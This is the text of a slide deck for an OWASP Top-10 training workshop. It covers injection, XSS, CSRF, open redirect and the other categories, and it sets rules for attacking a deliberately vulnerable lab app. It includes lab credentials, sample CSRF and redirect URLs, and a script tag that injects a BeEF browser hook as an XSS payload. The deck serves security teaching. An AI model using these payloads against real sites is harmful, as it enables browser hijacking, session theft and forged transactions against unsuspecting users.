OWASP Top-10 Hands-on Workshop

•Security Engineer @ SoftServe•NU “LP” student

whoami

•Web Application Security Assessment•Penetration Testing•Secure Software Development Lifecycle

What we do?

•Non-profit organization•Numerous chapters around the globe•Everyone can join•Open-Source

Open Web ApplicationSecurity Project

Meetings and conferences all around the globe

@AppSecEU ‘15 in Amsterdam

Knowledge base

OWASP Top-10

InjectionBroken Auth and

Session Management

XSSInsecure Direct

Object References

Security misconfiguration

Sensitive Data Exposure

Missing Function Level

ControlCSRF

Using Known Vulnerable

Components

Unvalidated Redirects and

Forwards

OWASP is GOOD!Hackers• Methodologies how to hack

Developers• Methodologies how to implement things securely and fix them

Testers• The same that hackers do• Methodologies how to test security stuff on their projects

Demo Time

•Either go by scenario with me or try to find 10 vulnerabilities by yourself.•No scanners (DDoS alert).•Do not attack infrastructure. Only web application vulnerabilities here.•Do not attack people around you.•No punching.

Rules

•172.16.216.28:5000/login?redirect_url=google.com•172.16.216.28:5000/change_password=1234•Credentials:

Let’s begin

terror0-9@gmail.com/passwordterror-admin0-9@gmail.com/admin

Open Redirect

example.com/smth?redirect_url=http://google.com

CSRF

bank.com/trans?acc1=1234&acc2=4321&ammount=10000

Open Redirect + CSRF

Cross-Site Scripting

Supply JS code instead of valid data which will be processed by the browser

Broken Auth

Session management flaws

(HTTPOnly flag is missing in

our case)

XSS + Broken Authentication

Inject this script into the website<script src=“<url to the hook>” type=“text/javascript”/>

BeEF

SQL-injection

Supply SQL operators and statements instead of valid data which will be processed with the server as SQL queries (not strings)

Security misconfiguration

Crypto misuse, wrong DB

configuration, etc

Sensitive Data Exposure

Critical info leakage

SQLi + Security Misconfiguration + Sensitive Data Exposure

Insecure Direct Object

Reference

Access file you have no

permission to

Missing Function Level Control

Access to restricted

(sensitive) function.

Using Components with known Vulnerabilities

Vulnerable OS, libraries, frameworks, CMS,

Algorithms, etc.

Everything else …

• Try it by yourselfhttps://github.com/Varyagovich/hole-blog• Try to fix the project• Use OWASP projects (attack/prevention

cheat sheets and tools)• Contribute!

What to do next?

http://owasp-lviv.blogspot.com/

STAY SAFE!